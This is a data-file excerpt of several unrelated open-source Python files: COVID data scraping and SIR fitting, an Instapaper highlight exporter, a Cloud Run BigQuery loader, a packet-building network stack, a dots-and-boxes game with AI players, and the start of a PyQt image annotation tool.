metadata
dict | text
stringlengths 60
3.49M
|
---|---|
{
"source": "jitinmat23/Enterprise_Data_Science_Covid_analysis",
"score": 3
} |
#### File: src/data/get_data_for_SIR.py
```python
import subprocess
import os
import pandas as pd
import numpy as np
from datetime import datetime
from bs4 import BeautifulSoup
import requests
import json
def get_johns_hopkins():
''' Get data by a git pull request, the source code has to be pulled first
Result is stored in the predifined csv structure
'''
git_pull = subprocess.Popen( ["git", "pull"],#"/usr/bin/git pull" ,
cwd = os.path.dirname( 'C:/Users/jitin/ads_covid-19/data/raw/COVID-19/' ),
shell = True,
stdout = subprocess.PIPE,
stderr = subprocess.PIPE )
(out, error) = git_pull.communicate()
print("Error : " + str(error))
print("out : " + str(out))
def get_current_data_germany():
''' Get current data from germany, attention API endpoint not too stable
Result data frame is stored as pd.DataFrame
'''
# 16 states
#data=requests.get('https://services7.arcgis.com/mOBPykOjAyBO2ZKk/arcgis/rest/services/Coronaf%C3%A4lle_in_den_Bundesl%C3%A4ndern/FeatureServer/0/query?where=1%3D1&outFields=*&outSR=4326&f=json')
# 400 regions / Landkreise
data=requests.get('https://services7.arcgis.com/mOBPykOjAyBO2ZKk/arcgis/rest/services/RKI_Landkreisdaten/FeatureServer/0/query?where=1%3D1&outFields=*&outSR=4326&f=json')
json_object=json.loads(data.content)
full_list=[]
for pos,each_dict in enumerate (json_object['features'][:]):
full_list.append(each_dict['attributes'])
pd_full_list=pd.DataFrame(full_list)
pd_full_list.to_csv('C:/Users/jitin/ads_covid-19/data/raw/NPGEO/GER_State_Data.csv',sep=';')
print(' Number of regions rows: '+str(pd_full_list.shape[0]))
def get_world_population_data():
page = requests.get("https://www.worldometers.info/world-population/population-by-country/")
soup = BeautifulSoup(page.content, 'html.parser')
html_table_pop = soup.find('table')
all_rows_pop = html_table_pop.find_all('tr')
final_pop_data_list=[]
for pos,rows in enumerate(all_rows_pop):
col_list= [each_col.get_text(strip=True) for each_col in rows.find_all('td') ]
final_pop_data_list.append(col_list)
reqd_pop_list = pd.DataFrame(final_pop_data_list).dropna()\
.rename(columns={1:'country', 2:'population'})
reqd_pop_list = reqd_pop_list[['country','population']]
#Replacing the Country List with Wrong Names
reqd_pop_list["country"]= reqd_pop_list["country"].replace({'Myanmar':'Burma', 'Czech Republic (Czechia)': 'Czechia', 'DR Congo': 'Congo (Kinshasa)', 'Congo': 'Congo (Brazzaville)', 'South Korea': 'Korea, South', 'St. Vincent & Grenadines': 'Saint Vincent and the Grenadines', 'Taiwan': 'Taiwan*', 'United States': 'US','State of Palestine': 'West Bank and Gaza', 'Côte d\'Ivoire': 'Cote d\'Ivoire'})
#Addition of New Data into the list : Like the Diamond Prince Kosova etc
list_new_country = [pd.Series(['Diamond Princess', 3711], index = reqd_pop_list.columns ) ,
pd.Series(['Kosovo', 1845000], index = reqd_pop_list.columns ) ,
pd.Series(['MS Zaandam', 1432], index = reqd_pop_list.columns ),
pd.Series(['<NAME> and Nevis', 52441], index = reqd_pop_list.columns ),
pd.Series(['<NAME> and Principe', 211028], index = reqd_pop_list.columns )]
#Changing the indexing of country from hightest population to Alphabhetical Order
reqd_pop_list = reqd_pop_list.append(list_new_country, ignore_index=True)\
.sort_values('country')\
.reset_index(drop=True)
reqd_pop_list.to_csv('C:/Users/jitin/ads_covid-19/data/raw/world_population_data.csv',sep=';',index=False)
print('Number of rows: '+str(reqd_pop_list.shape[0]))
if __name__ == '__main__':
get_johns_hopkins()
get_current_data_germany()
get_world_population_data()
```
#### File: src/features/build_features_SIR.py
```python
import pandas as pd
import numpy as np
from datetime import datetime
%matplotlib inline
import matplotlib as mpl
import matplotlib.pyplot as plt
import seaborn as sns
sns.set(style="darkgrid")
mpl.rcParams['figure.figsize'] = (16, 9)
pd.set_option('display.max_rows', 500)
pd.set_option('display.max_columns', None)
from scipy import optimize
from scipy import integrate
def data_gathering():
population_df = pd.read_csv('C:/Users/jitin/ads_covid-19/data/raw/world_population_data.csv',sep=';', thousands=',')
population_df = population_df.set_index(['country']).T
df_analyse = pd.read_csv('C:/Users/jitin/ads_covid-19/data/processed/all_country_data.csv',sep=';')
country_list = df_analyse.columns[1:]
infected_list = []
t=[]
for column in df_analyse.columns:
infected_list.append(np.array(df_analyse[column][75:]))
t = np.arange(len(infected_list))
infected_list = pd.DataFrame(infected_list,index=df_analyse.columns).T
infected_list.to_csv('C:/Users/jitin/ads_covid-19/data/processed/SIR/SIR_data.csv',sep=';',index=False)
optimized_df = pd.DataFrame(columns = df_analyse.columns[1:],
index = ['opt_beta', 'opt_gamma', 'std_dev_error_beta', 'std_dev_error_gamma'])
t = []
fitted_final_data = []
global I0, N0, S0, R0
for column in infected_list.columns[1:]:
I0 = infected_list[column].loc[0]
N0 = population_df[column].loc['population']
S0 = N0-I0
R0 = 0
t = np.arange(len(infected_list[column]))
popt=[0.4,0.1]
fit_odeint(t, *popt)
popt, pcov = optimize.curve_fit(fit_odeint, t, infected_list[column], maxfev=5000)
perr = np.sqrt(np.diag(pcov))
optimized_df.at['opt_beta', column] = popt[0]
optimized_df.at['opt_gamma', column] = popt[1]
optimized_df.at['std_dev_error_beta', column] = perr[0]
optimized_df.at['std_dev_error_gamma', column] = perr[1]
fitted = fit_odeint(t, *popt)
fitted_final_data.append(np.array(fitted))
optimized_df.to_csv('C:/Users/jitin/ads_covid-19/data/processed/SIR/optimized_SIR_data.csv',sep=';',index=False)
fitted_SIR_data_df = pd.DataFrame(fitted_final_data,index=df_analyse.columns[1:]).T
fitted_SIR_data_df.to_csv('C:/Users/jitin/ads_covid-19/data/processed/SIR/fitted_SIR_data.csv',sep=';',index=False)
print(' Number of rows stored in optimized df: '+str(optimized_df.shape[0]))
print(' Number of rows stored in fitted SIR data: '+str(fitted_SIR_data_df.shape[0]))
def SIR_model_t(SIRN,t,beta,gamma):
''' Simple SIR model
S: susceptible population
t: time step, mandatory for integral.odeint
I: infected people
R: recovered people
beta:
overall condition is that the sum of changes (differnces) sum up to 0
dS+dI+dR=0
S+I+R= N (constant size of population)
'''
S,I,R,N=SIRN
dS_dt=-beta*S*I/N #S*I is the
dI_dt=beta*S*I/N-gamma*I
dR_dt=gamma*I
dN_dt=0
return dS_dt,dI_dt,dR_dt,dN_dt
def fit_odeint(t, beta, gamma):
'''
helper function for the integration
'''
return integrate.odeint(SIR_model_t, (S0, I0, R0, N0), t, args=(beta, gamma))[:,1] # we only would like to get dI
if __name__ == '__main__':
# test_data_reg=np.array([2,4,6])
# result=get_doubling_time_via_regression(test_data_reg)
# print('the test slope is: '+str(result))
#
# pd_JH_data=pd.read_csv('C:/Users/jitin/ads_covid-19/data/processed//COVID_relational_confirmed.csv',sep=';',parse_dates=[0])
# pd_JH_data=pd_JH_data.sort_values('date',ascending=True).copy()
#
# #test_structure=pd_JH_data[((pd_JH_data['country']=='US')|
# # (pd_JH_data['country']=='Germany'))]
#
# pd_result_larg=calc_filtered_data(pd_JH_data)
# pd_result_larg=calc_doubling_rate(pd_result_larg)
# pd_result_larg=calc_doubling_rate(pd_result_larg,'confirmed_filtered')
#
#
# mask=pd_result_larg['confirmed']>100
# pd_result_larg['confirmed_filtered_DR']=pd_result_larg['confirmed_filtered_DR'].where(mask, other=np.NaN)
# pd_result_larg.to_csv('C:/Users/jitin/ads_covid-19/data/processed/COVID_final_set.csv',sep=';',index=False)
# print(pd_result_larg[pd_result_larg['country']=='Germany'].tail())
data_gathering()
``` |
{
"source": "jitinnair1/save-instapaper-highlights",
"score": 3
} |
#### File: jitinnair1/save-instapaper-highlights/downloader.py
```python
import datetime
import os
import configparser
import progressbar
import string
import codecs
import json
from instapaper import Instapaper
# Init instapaper with key, secret, login and password
def init():
# Read credentials from Credentials.ini file
configParser = configparser.RawConfigParser()
configParser.read('Credentials.ini')
key = configParser.get('Instapaper', 'INSTAPAPER_KEY')
secret = configParser.get('Instapaper', 'INSTAPAPER_SECRET')
login = configParser.get('Login', 'INSTAPAPER_LOGIN')
password = configParser.get('Login', 'INSTAPAPER_PASSWORD')
# Create instance of Instapaper using the OAth credentials
instapaper = Instapaper(key, secret)
# Login with user and password
instapaper.login(login, password)
return instapaper
def process_folder(folderid, existing):
# Get bookmarks from archive for each of the folders
bookmarks = instapaper.bookmarks(folder=folderid, have=existing, limit=500)
# process all bookmarks
process_bookmarks(bookmarks)
def check_saved_state():
# If there is no file in with bookmark hashes then create it
file_exists = os.path.isfile("saved_state.txt")
if file_exists:
print("Last State Exists")
# read file contents to existing
existing=get_list_of_existing_highlights()
return existing
def process_saved_state(foldername):
bookmarks = instapaper.bookmarks(folder=foldername, have="", limit=500)
for bookmark in bookmarks:
fp = open("../saved_state.txt", "a+")
fp.write(str(bookmark.bookmark_id) + ":" + bookmark.hash + ",")
def get_list_of_existing_highlights():
# Get all .md files in current directory
text_file = open("saved_state.txt", "r")
existing = text_file.readlines()
return existing
def change_to_highlights_folder():
# If there is no folder in the system with highlights then create it
if not os.path.exists('highlights'):
os.makedirs('highlights')
# Change to the folder
os.chdir('highlights')
# Process list of bookmarks
def process_bookmarks(bookmarks):
progress = progressbar.ProgressBar(max_value=len(bookmarks))
i = 1
for bookmark in bookmarks:
process_bookmark(bookmark)
progress.update(i)
i = i + 1
def get_filename_from_title(title):
"""Generate simpler file name from title
Arguments:
title {string} -- Simplified title to be used as the markdown filename
"""
printable = set(string.ascii_letters)
printable.add(' ')
return ''.join(filter(lambda x : x in printable, title)).strip().replace(' ', '_') + '.md'
# Process the highlights of one bookmark
def process_bookmark(bookmark):
# Get the highlights
highlights = bookmark.get_highlights()
#print(highlights) if there is any highlight
if len(highlights) > 0:
process_document(bookmark, highlights)
def process_document(bookmark, highlights):
"""Takes a document and generates the equivalent markdown file
Arguments:
document {dictionary} -- Dictionary with title, url and list of highlights
"""
output_path = get_filename_from_title(bookmark.title)
#parse highlights as JSON
highlights_json=json.loads(highlights)
# count number of highlights with a given bookmark id
highlight_count = len(highlights_json)
if(highlight_count>0):
with codecs.open(output_path, 'w', 'utf-8') as f:
f.write('# ' + bookmark.title + '\n')
f.write('\n')
f.write('[Source](' + bookmark.url + ')' + '\n')
f.write('\n')
f.write(repr(highlight_count) + ' highlights' +'\n')
f.write('\n')
f.write('---' + '\n')
f.write('\n')
index=0;
while index < highlight_count:
f.write('* '+ highlights_json[index]['text'])
if highlights_json[index]['note']!= None:
f.write("[^" + str(highlights_json[index]['highlight_id']) + "]")
f.write('\n\n')
f.write("[^" + str(highlights_json[index]['highlight_id']) + "]: " + str(highlights_json[index]['note']) + '\n')
f.write('\n\n')
index=index+1;
# ----------------------------------
# Init Instapaper
instapaper = init()
# Get existing highlights
existing=check_saved_state()
# Change to highlights folder
change_to_highlights_folder()
# Get list of folders
folders = instapaper.folders()
folders = [{"folder_id": "archive"}, {"folder_id": "starred"}] + folders
# Process bookmarks for each folder
for folder in folders:
if (folder['folder_id']=="archive" or folder['folder_id']=="starred"):
print("Processing Folder: " + folder['folder_id'])
else:
print("Processing Folder: " + folder['title'])
process_folder(folder['folder_id'], existing)
# create new file and add hash of all bookmarks
if os.path.exists("saved_state.txt"):
os.remove("saved_state.txt")
progress = progressbar.ProgressBar(max_value=len(folders))
print("Writing Last Saved States:")
for folder in folders:
i = 1
process_saved_state(folder['folder_id'])
progress.update(i)
i = i + 1
``` |
{
"source": "jitkasem-pdt/python-docs-samples",
"score": 2
} |
#### File: eventarc/audit-storage/main.py
```python
import os
from flask import Flask, request
from google.cloud import bigquery
app = Flask(__name__)
# [END eventarc_gcs_server]
# [START eventarc_gcs_handler]
@app.route('/', methods=['POST'])
def index():
# Gets the GCS bucket name from the CloudEvent header
# Example: "storage.googleapis.com/projects/_/buckets/my-bucket"
# storage.googleapis.com/projects/_/buckets/test_dong/objects/support_site.csv
bucket = request.headers.get('ce-subject')
tmp_bucket = bucket.split("/")
ttt = tmp_bucket[4]
qqq = tmp_bucket[6]
# Construct a BigQuery client object.
client = bigquery.Client()
# TODO(developer): Set table_id to the ID of the table to create.
table_id = "thailife.cloud_run.test_tbl"
job_config = bigquery.LoadJobConfig(
schema=[
bigquery.SchemaField("name", "STRING"),
bigquery.SchemaField("post_abbr", "STRING"),
],
skip_leading_rows=1,
# The source format defaults to CSV, so the line below is optional.
source_format=bigquery.SourceFormat.CSV,
)
uri = f"gs://{ttt}/{qqq}"
load_job = client.load_table_from_uri(
uri, table_id, job_config=job_config
) # Make an API request.
load_job.result() # Waits for the job to complete.
destination_table = client.get_table(table_id)
# Make an API request.
# print("Loaded {} rows.".format(destination_table.num_rows))
print(f"Detected change in GCS bucket: {bucket}")
return (f"Detected change in GCS bucket: {bucket}", 200)
# [END eventarc_gcs_handler]
# [START eventarc_gcs_server]
if __name__ == "__main__":
app.run(debug=True, host='0.0.0.0', port=int(os.environ.get('PORT', 8080)))
# [END eventarc_gcs_server]
``` |
{
"source": "Jitrixis/2ARC-Network-stack",
"score": 2
} |
#### File: TVpy/Factory/sniffery.py
```python
__author__ = 'jitrixis'
from TVpy.Layers.all import *
class Sniffery:
def __init__(self):
self.__passed = True
self.__type = ""
pass
def sniff(self, data):
self.__passed = True
packet = {}
'''Ethernet'''
valE = self.__sniffEthernet(data)
packet["ethernet"] = valE[0]
data = valE[1]
if (valE[0].getType() == 0x0800):
'''IPv4'''
valI = self.__sniffIp(data)
packet["ip"] = valI[0]
data = valI[1]
if (valI[0].getProto() == 1):
'''Icmp'''
valJ = self.__sniffIcmp(data)
packet["icmp"] = valJ[0]
data = valJ[1]
self.__type = "icmp"
elif (valI[0].getProto() == 6):
'''Tcp'''
valT = self.__sniffTcp(data)
packet["tcp"] = valT[0]
data = valT[1]
self.__type = "tcp"
else:
self.__passed = False
elif (valE[0].getType() == 0x0806):
'''Arp'''
valA = self.__sniffArp(data)
packet["arp"] = valA[0]
data = valA[1]
self.__type = "arp"
else:
self.__passed = False
'''Data'''
valD = self.__sniffData(data)
packet["data"] = valD[0]
data = valD[1]
if (self.__passed):
return {"type": self.__type, "packet": packet}
return None
def __sniffEthernet(self, data):
return self.__sniffAll(Ethernet(), data)
def __sniffArp(self, data):
return self.__sniffAll(Arp(), data)
def __sniffIcmp(self, data):
return self.__sniffAll(Icmp(), data)
def __sniffIp(self, data):
return self.__sniffAll(Ip(), data)
def __sniffTcp(self, data):
return self.__sniffAll(Tcp(), data)
def __sniffData(self, data):
return self.__sniffAll(Data(), data)
def __sniffAll(self, cls, data):
data = cls.fromSource(data)
return [cls, data]
```
#### File: Layers/Frame/Ethernet.py
```python
__author__ = 'jitrixis'
from TVpy.Factory.toolsheds import Toolkit
class Ethernet:
def __init__(self):
self.__src = '00:00:00:00:00:00'
self.__dst = 'ff:ff:ff:ff:ff:ff'
self.__type = 0x0
'''Destination MAC Address'''
def getDst(self):
return self.__dst
def setDst(self, dst):
self.__dst = dst
return self
def __buildDst(self):
return Toolkit.buildMAC(self.__dst)
def __consumeDst(self, data):
val = Toolkit.consumeMAC(data)
self.__dst = val[0]
return val[1]
'''Source MAC Address'''
def getSrc(self):
return self.__src
def setSrc(self, src):
self.__src = src
return self
def __buildSrc(self):
return Toolkit.buildMAC(self.__src)
def __consumeSrc(self, data):
val = Toolkit.consumeMAC(data)
self.__src = val[0]
return val[1]
'''Type Ethernet Data'''
def getType(self):
return self.__type
def setType(self, type):
self.__type = type
return self
def __buildType(self):
return Toolkit.buildInt2(self.__type)
def __consumeType(self, data):
val = Toolkit.consumeInt2(data)
self.__type = val[0]
return val[1]
'''Building method'''
def build(self):
return self.__buildDst() + self.__buildSrc() + self.__buildType()
def fromSource(self, data):
data = self.__consumeDst(data)
data = self.__consumeSrc(data)
data = self.__consumeType(data)
return data
def getLength(self):
return len(self.build())
```
#### File: Layers/Packet/ARP.py
```python
__author__ = 'jitrixis'
from TVpy.Factory.toolsheds import Toolkit
class Arp:
def __init__(self):
self.__hwtype = 0x1
self.__ptype = 0x800
self.__hwlen = 6
self.__plen = 4
self.__op = 0x1
self.__hwsrc = '00:00:00:00:00:00'
self.__psrc = '0.0.0.0'
self.__hwdst = '00:00:00:00:00:00'
self.__pdst = '0.0.0.0'
'''Hardware Type'''
def getHwtype(self):
return self.__hwtype
def setHwtype(self, hwtype):
self.__hwtype = hwtype
return self
def __buildHwtype(self):
return Toolkit.buildInt2(self.__hwtype)
def __consumeHwtype(self, data):
val = Toolkit.consumeInt2(data)
self.__hwtype = val[0]
return val[1]
'''IP Type'''
def getPtype(self):
return self.__ptype
def setPtype(self, ptype):
self.__ptype = ptype
return self
def __buildPtype(self):
return Toolkit.buildInt2(self.__ptype)
def __consumePtype(self, data):
val = Toolkit.consumeInt2(data)
self.__ptype = val[0]
return val[1]
'''Hardware length'''
def getHwlen(self):
return self.__hwlen
def setHwlen(self, hwlen):
self.__hwlen = hwlen
return self
def __buildHwlen(self):
return Toolkit.buildInt1(self.__hwlen)
def __consumeHwlen(self, data):
val = Toolkit.consumeInt1(data)
self.__hwlen = val[0]
return val[1]
'''IP length'''
def getPlen(self):
return self.__plen
def setPlen(self, plen):
self.__plen = plen
return self
def __buildPlen(self):
return Toolkit.buildInt1(self.__plen)
def __consumePlen(self, data):
val = Toolkit.consumeInt1(data)
self.__plen = val[0]
return val[1]
'''Operation'''
def getOp(self):
return self.__op
def setOp(self, op):
self.__op = op
return self
def __buildOp(self):
return Toolkit.buildInt2(self.__op)
def __consumeOp(self, data):
val = Toolkit.consumeInt2(data)
self.__op = val[0]
return val[1]
'''Hardware Source'''
def getHwsrc(self):
return self.__hwsrc
def setHwsrc(self, hwsrc):
self.__hwsrc = hwsrc
return self
def __buildHwsrc(self):
return Toolkit.buildMAC(self.__hwsrc)
def __consumeHwsrc(self, data):
val = Toolkit.consumeMAC(data)
self.__hwsrc = val[0]
return val[1]
'''IP Source'''
def getPsrc(self):
return self.__psrc
def setPsrc(self, psrc):
self.__psrc = psrc
return self
def __buildPsrc(self):
return Toolkit.buildIPv4(self.__psrc)
def __consumePsrc(self, data):
val = Toolkit.consumeIPv4(data)
self.__psrc = val[0]
return val[1]
'''Hardware Destination'''
def getHwdst(self):
return self.__hwdst
def setHwdst(self, hwdst):
self.__hwdst = hwdst
return self
def __buildHwdst(self):
return Toolkit.buildMAC(self.__hwdst)
def __consumeHwdst(self, data):
val = Toolkit.consumeMAC(data)
self.__hwdst = val[0]
return val[1]
'''IP Destination'''
def getPdst(self):
return self.__pdst
def setPdst(self, pdst):
self.__pdst = pdst
return self
def __buildPdst(self):
return Toolkit.buildIPv4(self.__pdst)
def __consumePdst(self, data):
val = Toolkit.consumeIPv4(data)
self.__pdst = val[0]
return val[1]
'''Building method'''
def build(self):
ret = self.__buildHwtype() + self.__buildPtype()
ret += self.__buildHwlen() + self.__buildPlen()
ret += self.__buildOp()
ret += self.__buildHwsrc() + self.__buildPsrc()
ret += self.__buildHwdst() + self.__buildPdst()
return ret
def fromSource(self, data):
data = self.__consumeHwtype(data)
data = self.__consumePtype(data)
data = self.__consumeHwlen(data)
data = self.__consumePlen(data)
data = self.__consumeOp(data)
data = self.__consumeHwsrc(data)
data = self.__consumePsrc(data)
data = self.__consumeHwdst(data)
data = self.__consumePdst(data)
return data
def getLength(self):
return len(self.build())
```
#### File: Layers/Packet/ICMP.py
```python
__author__ = 'jitrixis'
from TVpy.Factory.toolsheds import Toolkit
class Icmp:
def __init__(self):
self.__type = 8
self.__code = 0
self.__checksum = 0x0
self.__id = 0x0
self.__seq = 0x0
'''Type'''
def getType(self):
return self.__type
def setType(self, type):
self.__type = type
return self
def __buildType(self):
return Toolkit.buildInt1(self.__type)
def __consumeType(self, data):
val = Toolkit.consumeInt1(data)
self.__type = val[0]
return val[1]
'''Code'''
def getCode(self):
return self.__code
def setCode(self, code):
self.__code = code
return self
def __buildCode(self):
return Toolkit.buildInt1(self.__code)
def __consumeCode(self, data):
val = Toolkit.consumeInt1(data)
self.__code = val[0]
return val[1]
'''Checksum'''
def getChecksum(self):
self.__setChecksum()
return self.__checksum
def __setChecksum(self):
first_sum = 0
first_sum += self.getType() * 0x100 + self.getCode()
first_sum += self.getId()
first_sum += self.getSeq()
second_sum = first_sum % 0x10000
second_sum += first_sum / 0x10000
self.__checksum = second_sum ^ 0xffff
return self
def __buildChecksum(self):
self.__setChecksum()
return Toolkit.buildInt2(self.__checksum)
def __consumeChecksum(self, data):
val = Toolkit.consumeInt2(data)
self.__checksum = val[0]
return val[1]
'''Id'''
def getId(self):
return self.__id
def setId(self, id):
self.__id = id
return self
def __buildId(self):
return Toolkit.buildInt2(self.__id)
def __consumeId(self, data):
val = Toolkit.consumeInt2(data)
self.__id = val[0]
return val[1]
'''Sequence'''
def getSeq(self):
return self.__seq
def setSeq(self, seq):
self.__seq = seq
return self
def __buildSeq(self):
return Toolkit.buildInt2(self.__seq)
def __consumeSeq(self, data):
val = Toolkit.consumeInt2(data)
self.__seq = val[0]
return val[1]
'''Building method'''
def build(self):
ret = self.__buildType() + self.__buildCode()
ret += self.__buildChecksum()
ret += self.__buildId()
ret += self.__buildSeq()
return ret
def fromSource(self, data):
data = self.__consumeType(data)
data = self.__consumeCode(data)
data = self.__consumeChecksum(data)
data = self.__consumeId(data)
data = self.__consumeSeq(data)
return data
def getLength(self):
return len(self.build())
``` |
{
"source": "Jitrixis/4AIT-Project",
"score": 3
} |
#### File: 4AIT-Project/game/player.py
```python
import random
from game.board import VirtualBoard
from ui.uiutils import UIUtils
class AbsractPlayer:
PLAYER_NUMBER = 0
def __init__(self, player=None):
if player is not None:
self._player = player
else:
self._player = self.PLAYER_NUMBER
self.PLAYER_NUMBER += 1
def get_player(self):
return self._player
def run(self, semaphore_event, board):
pass
class HumanPlayer(AbsractPlayer):
def __init__(self):
super().__init__()
def run(self, semaphore_event, board):
if semaphore_event is not None:
board.play(semaphore_event)
class AI1Player(AbsractPlayer):
def __init__(self):
super().__init__()
def run(self, semaphore_event, board):
l = self._pos_of(self._available_square(board))
board.play(random.choice(l))
def _available_square(self, board):
return [square for row in board.get_squares() for square in row if not square]
def _pos_of(self, squares):
lines = []
for square in squares:
lines += [line.get_pos() for line in square.get_lines() if not line]
lines = set(lines)
return list(lines)
class AI2Player(AI1Player):
def __init__(self):
super().__init__()
def run(self, semaphore_event, board):
l = self._pos_of(self._priority_square(board))
if len(l) == 0:
l = self._pos_of(self._available_square(board))
board.play(random.choice(l))
def _priority_square(self, board):
return [square for row in board.get_squares() for square in row if len(square) == 3]
class AI3Player(AI2Player):
def __init__(self):
super().__init__()
def run(self, semaphore_event, board):
l = self._pos_of(self._priority_square(board))
if len(l) == 0:
d = self._pos_of(self._dangerous_square(board))
a = self._pos_of(self._available_square(board))
l = [line for line in a if line not in d]
if len(l) == 0:
l = self._pos_of(self._available_square(board))
board.play(random.choice(l))
def _dangerous_square(self, board):
return [square for row in board.get_squares() for square in row if len(square) == 2]
class AI4Player(AI3Player):
def __init__(self):
super().__init__()
def run(self, semaphore_event, board):
l = self._pos_of(self._priority_square(board))
if len(l) == 0:
d = self._pos_of(self._dangerous_square(board))
a = self._pos_of(self._available_square(board))
l = [line for line in a if line not in d]
if len(l) == 0:
e = self._count_effect(board)
if len(e):
l = [p for f in min(e, key=len) for p in f]
if len(l) == 0:
l = self._pos_of(self._available_square(board))
board.play(random.choice(l))
def _count_effect(self, board):
pairs = [[tuple(line.get_pos() for line in square.get_lines() if not line)] for square in
self._dangerous_square(board)]
changed = True
while changed:
changed = False
for i in range(len(pairs) - 1):
for j in range(i + 1, len(pairs)):
if bool(set(p for e in pairs[i] for p in e) & set(p for e in pairs[j] for p in e)):
pairs[i] += pairs[j]
pairs[j] = []
changed = True
pairs = [e for e in pairs if len(e)]
return pairs
class AI5Player(AI4Player):
def __init__(self):
super().__init__()
def run(self, semaphore_event, board):
d = self._pos_of(self._dangerous_square(board))
a = self._pos_of(self._available_square(board))
e = self._count_effect(board)
o = self._pos_of(self._priority_square(board))
l = []
if len(l) == 0:
l = o
if len(l) > 0:
ef = self._count_effect(board)
if len(ef) > 0 and not len([line for line in a if line not in d]):
mef = []
oef = []
for pef in ef:
if bool(set(p for sq in pef for p in sq) & set(l)):
mef.append(pef)
else:
oef.append(pef)
if len(mef) == 1:
if len(mef[0]) == 1:
if len(oef) % board.get_num_player():
l = [p for p in mef[0][0] if p not in l]
if len(l) == 0:
l = [line for line in a if line not in d]
if len(l) == 0:
if len(e):
l = [p for f in min(e, key=len) for p in f]
if len(l) == 0:
l = self._pos_of(self._available_square(board))
board.play(random.choice(l))
class Developer(AbsractPlayer):
def __init__(self, cls):
super().__init__(cls.get_player())
self.__cls_player = cls
self.__want = None
def run(self, semaphore_event, board):
if self.__want is None:
v = VirtualBoard(board)
self.__cls_player.run(None, v)
self.__want = v.get_last_play()
else:
UIUtils.debug_line(self.__want)
if type(semaphore_event) is tuple:
board.play(semaphore_event)
self.__want = None
elif semaphore_event == 'N':
board.play(self.__want)
self.__want = None
``` |
{
"source": "JitseB/ImageP",
"score": 2
} |
#### File: JitseB/ImageP/imagep.py
```python
from PyQt5 import QtWidgets, QtGui, QtCore
import pyqtgraph as pg
import numpy as np
import sys, cv2
VERSION_INFO = 'version 2.5'
CHANGELOG = """Changelog:
Version 2.5 (19 June 2021):
- Swapped out Matplotlib for PyQtGraph for better video performance.
- Added LUT (lookup-table) to change different levels of red-green-blue.
- Added image/frame grayscale converter as tickbox in the GUI.
Version 2.4 (26 May 2021):
- Refactoring.
- Bug fix: When setting the 'frame' parameter, the initial frame now corresponds to this value.
Version 2.3 (25 May 2021):
- Bug fix: When no dots have been clicked yet, the menu ctrl+z button no longer throws an error.
- Video files are now supported! By using the right and left arrow one can flip through the frames.
- Auto-progress parameter was added for videos.
- Added frame number to statusbar for videos.
- Added alpha parameters (also: keep_alpha parameter) to change axis and dot opacity.
- Added 'auto_progress_frame_interval' as video parameter so that frames can be skipped when auto-progressing the frames.
Version 2.2 (22 May 2021):
- Bug fix: No dot added when in zoom or pan mode.
- Added ctrl+z feature to remove previously clicked dot.
Version 2.1 (16 May 2021):
- Bug fix: 'gui'-parameters now actually work.
- Bug fix: Reuse QtApplication, otherwise the kernel dies in Jupyter notebooks.
- Bug fix: Catching warning caused by angle measurement.
- Removed unit origin as we cannot know it previous position, therefore we cannot compensate for it properly.
Version 2.0 (16 May 2021):
- Converted to PyQt5 application for more functionality.
- Added movable origin and button.
- Added About and Help page.
- Changed Pillow out for OpenCV for future compatibility of videos.
- Added status bar with position, distance and angle texts.
- Added pixel calibration mechanism.
- Lots of refactoring and added documentation.
Version 1.0 (9 May 2021):
- Simple single class image processor using a Matplotlib GUI and its events.
"""
DOCUMENTATION = """Please view the documentation on the <a href="https://github.com/JitseB/ImageP/blob/main/DOCUMENTATION.md">GitHub repository</a>."""
class PlotWidget(QtWidgets.QWidget):
point_add_event = QtCore.pyqtSignal(tuple)
point_remove_last_event = QtCore.pyqtSignal()
origin_change_event = QtCore.pyqtSignal(tuple)
mouse_move_event = QtCore.pyqtSignal(tuple)
"""Qt widget to hold the PyQtGraph widget and the tools for interacting with the plot"""
def __init__(self, window):
QtWidgets.QWidget.__init__(self)
self.image = np.flipud(np.rot90(window.image))
self.color = window.color
self._shift_active = False
self.origin_move_active = False
self._grayscale_active = False
self.canvas = pg.ImageView()
# Use a grid layout for the plot, LUT and settings (with title)
# Since the settings and LUT only need local referencing, we do not have to create a seperate class
layout = QtGui.QGridLayout()
self.setLayout(layout)
self.lut = pg.HistogramLUTWidget()
layout.addWidget(self.lut, 1, 1)
self._plt = pg.plot()
self._plt.setAspectLocked(True)
self.img = pg.ImageItem(self.image)
self.img.setZValue(-10)
self.scatter = pg.ScatterPlotItem(pen=None, brush=pg.mkBrush(self.color))
self._plt.addItem(self.scatter)
self._plt.addItem(self.img)
self._plt.invertY(True) # Vertical axis counts top to bottom
self._plt.hideAxis('left')
self._plt.hideAxis('bottom')
layout.addWidget(self._plt, 0, 0, 5, 1)
self.lut.setImageItem(self.img)
# Settings (with title)
label = QtGui.QLabel('<span style="font-weight:bold">Keymap:</span><br><span style="text-decoration:underline">Shift-click</span>: Add new point<br><span style="text-decoration:underline">Z</span>: Remove last point<br><span style="text-decoration:underline">Left/right arrow</span>: Change frame<br><br><span style="font-weight:bold">Image post-processing:</span>')
layout.addWidget(label, 0, 1)
grayBox = QtGui.QCheckBox('grayscale')
monoRadio = QtGui.QRadioButton('mono')
rgbaRadio = QtGui.QRadioButton('rgba')
grayBox = QtGui.QCheckBox('grayscale')
layout.addWidget(monoRadio, 2, 1)
layout.addWidget(rgbaRadio, 3, 1)
layout.addWidget(grayBox, 4, 1)
monoRadio.setChecked(True)
# Grayscale click action
def setGrayscale(state):
if state == QtCore.Qt.Checked:
# Convert rgb image to gray image using std formula
self.img.setImage(np.dot(self.image[...,:3], [0.299, 0.587, 0.114]))
monoRadio.setChecked(True)
rgbaRadio.setChecked(False)
rgbaRadio.setEnabled(False)
self._grayscale_active = True
else:
self.img.setImage(self.image)
rgbaRadio.setEnabled(True)
self._grayscale_active = False
# Connect state change events to their functions
grayBox.stateChanged.connect(setGrayscale)
monoRadio.toggled.connect(lambda _: self.lut.setLevelMode('mono' if monoRadio.isChecked() else 'rgba'))
# Disable the grayscale and rgb buttons if the image dooes not have rgb data
if len(self.image.shape) < 3:
grayBox.setEnabled(False)
rgbaRadio.setEnabled(False)
# Origin lines
self._origin_vline = pg.InfiniteLine(angle=90, pos=window.origin[0], pen=self.color, movable=False)
self._origin_hline = pg.InfiniteLine(angle=0, pos=window.origin[1], pen=self.color, movable=False)
self._plt.addItem(self._origin_vline, ignoreBounds=True)
self._plt.addItem(self._origin_hline, ignoreBounds=True)
# Connect the signal proxies and events
self._mouse_move_proxy = pg.SignalProxy(self._plt.scene().sigMouseMoved, rateLimit=60, slot=self._mouse_move_handler)
